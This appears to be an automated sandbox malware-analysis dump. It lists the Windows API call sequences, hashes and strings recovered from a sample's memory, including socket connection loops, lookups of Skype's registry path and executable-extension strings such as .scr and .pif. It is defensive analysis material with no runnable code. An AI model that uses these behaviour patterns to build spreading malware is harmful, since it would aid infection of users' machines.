                                                                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 0040DD05
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 0040DD17
                                                                                                                                                                                                                                                      • connect.WS2_32(00000000,00000000,00000010), ref: 0040DD23
                                                                                                                                                                                                                                                      • select.WS2_32(00000001,00000000,?,?,00000008), ref: 0040DD6A
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040DD84
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040DD96
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0040DDAA
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 0040DDB5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3016611618-0
                                                                                                                                                                                                                                                      • Opcode ID: a94e73af70105644cc51a5b1a60949092c05d3ef8cfe4912ca4a05a6af3f6b7b
                                                                                                                                                                                                                                                      • Instruction ID: f4301eb2fe830097385759cdc77246e76bd1525ce38ffd049ed5210f823006c9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a94e73af70105644cc51a5b1a60949092c05d3ef8cfe4912ca4a05a6af3f6b7b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F317E71D01218EBDB21DBA4CC48BEE76BCAF04315F1041BAF515F21C1DB788A498BA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00408E0A
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00408E3B
                                                                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00408E48
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 00408E5A
                                                                                                                                                                                                                                                      • connect.WS2_32(00000000,00457890,00000010), ref: 00408E64
                                                                                                                                                                                                                                                      • select.WS2_32(00000001,00000000,?,?,00000008), ref: 00408EAB
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00408EC5
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00408ED7
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00408EEF
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00408EFA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ioctlsocket$ErrorLastSleepclosesocketconnectselectsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3016611618-0
                                                                                                                                                                                                                                                      • Opcode ID: fac358dad4d35f7003cf61e88a50e81e1635f8c6fac4a525d582d34b8dab9462
                                                                                                                                                                                                                                                      • Instruction ID: 095206dfada03d9d992cabdccbc1e7c9fd4fcaa7cc267275af628481ba7455b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fac358dad4d35f7003cf61e88a50e81e1635f8c6fac4a525d582d34b8dab9462
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE31AF71901218ABD7219FA0CE48BEE7A7CEB04316F1041BEF155F21C2DF789E458BA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00414E1A
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00414E2D
                                                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00414E3C
                                                                                                                                                                                                                                                      • connect.WS2_32(00000000,00000002,00000010), ref: 00414E53
                                                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,00000000), ref: 00414E62
                                                                                                                                                                                                                                                      • select.WS2_32(00000000,00000000,?,?,?), ref: 00414EA6
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00414EB8
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00414ECA
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00414EE1
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 00414EE7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ioctlsocket$ErrorLastclosesocketconnecthtonsselectsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2173793709-0
                                                                                                                                                                                                                                                      • Opcode ID: 7c2a54aeaa611af5f0956abcd23816055dea6c1293f3ca778e40e3a7da28d482
                                                                                                                                                                                                                                                      • Instruction ID: e0b37a306a2363686957244b9fcd8f3cc0c7b7d42db451f1a47bf8cbf8c9e55f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c2a54aeaa611af5f0956abcd23816055dea6c1293f3ca778e40e3a7da28d482
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1212A75900218ABDB11DFA59C489EFBBBCFF88311F40016AF915E2251DB349E418FA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00414776: EnumWindows.USER32(Function_0001470D,?), ref: 00414780
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045A330), ref: 0041CFA5
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000080), ref: 0041CFB6
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 0041CFBF
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041CFE0
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041CFEC
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_0001CCD4,00000000), ref: 0041D00E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0041D016
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020), ref: 0041D034
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 0041D037
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0045A330), ref: 0041D03A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ClassCriticalCurrentEnumPriorityProcessSectionSleepWindows$CountEnterLeaveTick
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3252203978-0
                                                                                                                                                                                                                                                      • Opcode ID: cdccc271a5faede5c3c40e492aa862e350efc3fc6618a7e925b96b859fc216cf
                                                                                                                                                                                                                                                      • Instruction ID: a5a336119df253f1fffcdf563039a0c9a3a08ae81fb15b9ae4675bd3370d4f64
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdccc271a5faede5c3c40e492aa862e350efc3fc6618a7e925b96b859fc216cf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF11C6717403009BD7209F75EC49B973B98E70AB16F144033E900C23E1CB68D896DAAE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTicklstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: .bat$.exe$.pif$.rar$.scr
                                                                                                                                                                                                                                                      • API String ID: 974621299-1980087502
                                                                                                                                                                                                                                                      • Opcode ID: 9386c808ec8e78b7e541b69b17434239a1d2e3c1f17c8a87bc6550394096fa31
                                                                                                                                                                                                                                                      • Instruction ID: 0833c643f36b4e56fa08517ae73d9ed4a666b7fca15df4142953dd5a3c489212
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9386c808ec8e78b7e541b69b17434239a1d2e3c1f17c8a87bc6550394096fa31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD310375A4C240ABFB255714DC0577A7FA0DF46314F68407BE840622D2D2BD7886D75F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Skype\Phone,00000000,00020019,?), ref: 0041BEEE
                                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,SkypePath,00000000,?,?,00000103), ref: 0041BF1B
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0041BF2B
                                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Skype\Phone,00000000,00020019,?), ref: 0041BF48
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Open$CloseQueryValue
                                                                                                                                                                                                                                                      • String ID: SkypePath$Software\Skype\Phone
                                                                                                                                                                                                                                                      • API String ID: 3546245721-1117510324
                                                                                                                                                                                                                                                      • Opcode ID: 367d10a8c13fbdfcf413f15c4e4f4e263d2e2bbd6f5fd1b6ca457838a974c5a3
                                                                                                                                                                                                                                                      • Instruction ID: fb9f27605ba17053757c1271e333da3dbb66d25b01c5d52620dba162a9001a23
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 367d10a8c13fbdfcf413f15c4e4f4e263d2e2bbd6f5fd1b6ca457838a974c5a3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0218971A44218BEEB108FA59C88FEFBFBCEB04305F0040AAB905E1151DB758645CBA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • select.WS2_32(?,?,00000000,00000000,?), ref: 00402A96
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(?,?), ref: 00402AA4
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000001,00000000), ref: 00402AB9
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402CA8
                                                                                                                                                                                                                                                      • select.WS2_32 ref: 00402D0E
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(?,00000001), ref: 00402D1C
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,?,00000000), ref: 00402D31
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0044F7B8), ref: 00402E54
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0044F7B8), ref: 00402E8C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionrecvselect$EnterLeavelstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3838822492-0
                                                                                                                                                                                                                                                      • Opcode ID: 234b5d2d9ce00fd92bc2467f92b6c101c542df7e0db91ddc04daa3ce2dd0cd8e
                                                                                                                                                                                                                                                      • Instruction ID: 80c32ccfba796d0bdac9e6fe8b9400a056a3b3623a8915c7911b96f3597059b9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 234b5d2d9ce00fd92bc2467f92b6c101c542df7e0db91ddc04daa3ce2dd0cd8e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E02D771A043889EDF21DF64CD49ADE7BACAF59304F44406BF908A32C1D6B8DA44CF59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CompareStringW.KERNEL32(00000000,00000000,0042B908,00000001,0042B908,00000001,0042C4D8,00000040,00427184,00000001,?,00000000,00422306,00000000,?,0042413A), ref: 0042906F
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 00429081
                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(76AF0F00,00000000,0042C4D8,00000040,00427184,00000001,?,00000000,00422306,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310), ref: 0042912B
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000009,00000000,?,00000000,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 004291B9
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000001,00000000,?,?,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 00429232
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000009,776AC310,00000000,00000000,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 0042924F
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000001,776AC310,00000000,?,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 004292C5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1773772771-0
                                                                                                                                                                                                                                                      • Opcode ID: e32b7b48b83c6e9d5d1115c6ec31c10b8bff38056a486a14eaf21c473df95895
                                                                                                                                                                                                                                                      • Instruction ID: 508109000cae9e2cdd248d7729261c4b8c559b822e122794a458f7e770b08d33
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e32b7b48b83c6e9d5d1115c6ec31c10b8bff38056a486a14eaf21c473df95895
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAB1AF71B00269EBDF21CF65EC85AAE7BB5EF48710F90001BF814A62A1D7398D61CB59
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00000000,?,?,?,004165F7,?,errorCode,?), ref: 004162D6
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,004165F7,?,errorCode,?), ref: 004162E7
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: Sleep.KERNEL32(0000012C,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C14
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C1D
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041630A
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00416317
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416349
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?), ref: 00416351
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416366
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$Heap$Processwsprintf$AllocateSleep
                                                                                                                                                                                                                                                      • String ID: <%s>$</%s>
                                                                                                                                                                                                                                                      • API String ID: 2639865369-2028509962
